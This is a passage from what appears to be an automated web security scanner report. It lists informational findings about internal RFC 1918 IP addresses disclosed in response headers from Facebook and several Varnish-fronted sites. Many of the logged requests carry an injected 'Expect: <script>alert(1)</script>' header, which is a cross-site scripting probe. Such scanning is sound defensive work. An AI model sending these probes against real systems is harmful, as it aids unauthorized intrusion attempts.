Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yj/r/QyZCsJKRLP8.css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yj/r/QyZCsJKRLP8.css HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/facepile.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=400&max_rows=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 19 Apr 2011 01:59:25 GMT
X-FB-Server: 10.138.64.186
Vary: Accept-Encoding
Cache-Control: public, max-age=30291344
Expires: Wed, 18 Apr 2012 15:09:49 GMT
Date: Wed, 04 May 2011 00:54:05 GMT
Connection: close
Content-Length: 3575

/*1303225843,176832698*/

.fbProfileLink{float:left;display:block}
.metadata{margin:7px 0 4px 0;font-size: 11px;color:#000}
.metadata_with_margin{margin-left:20px}
.profile_images_with_margin{margin-l
...[SNIP]...

26.9. http://static.ak.fbcdn.net/rsrc.php/v1/zU/r/bSOHtKbCGYI.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zU/r/bSOHtKbCGYI.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zU/r/bSOHtKbCGYI.png HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: image/png
Last-Modified: Mon, 15 Mar 2010 07:59:03 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.148.193
X-Cnection: close
Cache-Control: public, max-age=27266578
Expires: Wed, 14 Mar 2012 14:57:01 GMT
Date: Wed, 04 May 2011 00:54:03 GMT
Connection: close

.PNG
.
...IHDR.............+.<....,IDAT.[c.u...7..b`.l. 1.    ...P$`.(...p    tA..6..|..........IEND.B`.

26.10. http://www.ahsnewsletters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ahsnewsletters.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahsnewsletters.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1475820366
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:53:22 GMT
Via: 1.1 varnish 172.17.35.70
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.11. http://www.blackonlineeducation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackonlineeducation.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blackonlineeducation.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1820871880
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:19:49 GMT
Via: 1.1 varnish 172.16.11.58
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.12. http://www.bluhomes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluhomes.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bluhomes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 444248268
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:48:54 GMT
Via: 1.1 varnish 172.17.66.86
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.13. http://www.bombaxo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bombaxo.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bombaxo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 418714297
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:09:02 GMT
Via: 1.1 varnish 172.17.19.60
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.14. http://www.bookreporter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bookreporter.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bookreporter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 686859986
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:25:32 GMT
Via: 1.1 varnish 172.17.34.80
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.15. http://www.cmbresearch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmbresearch.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cmbresearch.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 591371563
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 02:14:09 GMT
Via: 1.1 varnish 172.17.34.210
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.16. http://www.degreedriven.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.degreedriven.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.degreedriven.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 358362397
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:30:52 GMT
Via: 1.1 varnish 172.17.34.106
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.17. http://www.dgnewswire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dgnewswire.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dgnewswire.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 684452609
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:58:42 GMT
Via: 1.1 varnish 172.17.34.80
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.18. http://www.diabetesmellitus-information.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesmellitus-information.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.diabetesmellitus-information.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 442413781
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:54:50 GMT
Via: 1.1 varnish 172.17.66.86
Connection: Keep-Alive
Age: 0
Content-Length: 484


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.19. http://www.digitalart.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitalart.org
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.digitalart.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 2236992932
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 01:13:48 GMT
Via: 1.1 varnish 172.17.2.192
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.20. http://www.erate.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.erate.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.erate.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Varnish
X-Varnish: 1813668195
Retry-After: 0
X-Cache: MISS
Content-Type: text/html; charset=utf-8
Date: Wed, 04 May 2011 03:03:08 GMT
Via: 1.1 varnish 172.17.34.171
Connection: Keep-Alive
Age: 0
Content-Length: 485


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...

26.21. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=28843894233&uniqid=stream_content HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US
X-SVN-Rev: 373353
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.150.53
X-Cnection: close
Date: Wed, 04 May 2011 00:54:05 GMT
Content-Length: 65645

for (;;);{"__ar":1,"payload":null,"css":["eFfLJ","hMw7i","P9g\/s"],"onload":["DOM.setContent(DOM.find(document.documentElement, \"#stream_content\"), HTML(\"\\u003cdiv id=\\\"div_story_4dc0a3ad3931132
...[SNIP]...

26.22. http://www.facebook.com/plugins/facepile.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/facepile.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/facepile.php?href=http%3A%2F%2Fwww.facebook.com%2FBurtGoldmanFanPage&width=400&max_rows=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.204.36
X-Cnection: close
Date: Wed, 04 May 2011 00:54:05 GMT
Content-Length: 5630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.23. http://www.facebook.com/plugins/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/fan.php?id=28843894233&width=300&connections=10&stream=true&header=false&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.166.32
X-Cnection: close
Date: Wed, 04 May 2011 00:54:02 GMT
Content-Length: 12036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.24. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.truewoman.com%2F&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.54
X-Cnection: close
Date: Wed, 04 May 2011 01:12:07 GMT
Content-Length: 6248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.25. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D224&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/?id=224
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.96.45
X-Cnection: close
Date: Wed, 04 May 2011 01:12:29 GMT
Content-Length: 6306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.26. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fcnet&layout=button_count&show_faces=false&width=120&action=like&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.245.73
X-Cnection: close
Date: Wed, 04 May 2011 01:28:55 GMT
Content-Length: 6284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.27. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.truewoman.com%2F%3Fid%3D1369&layout=button_count&show_faces=false&width=100&action=like&font=arial&layout=button_count HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/?id=1369
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.61.43
X-Cnection: close
Date: Wed, 04 May 2011 01:12:30 GMT
Content-Length: 6290

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.28. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=www.facebook.com%2FBurtGoldmanFanPage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.154.31
X-Cnection: close
Date: Wed, 04 May 2011 00:53:33 GMT
Content-Length: 6433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

26.29. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com/burtgoldmanfanpage&layout=button_count&show_faces=true&width=90&action=like&font=lucida+grande&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/products
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
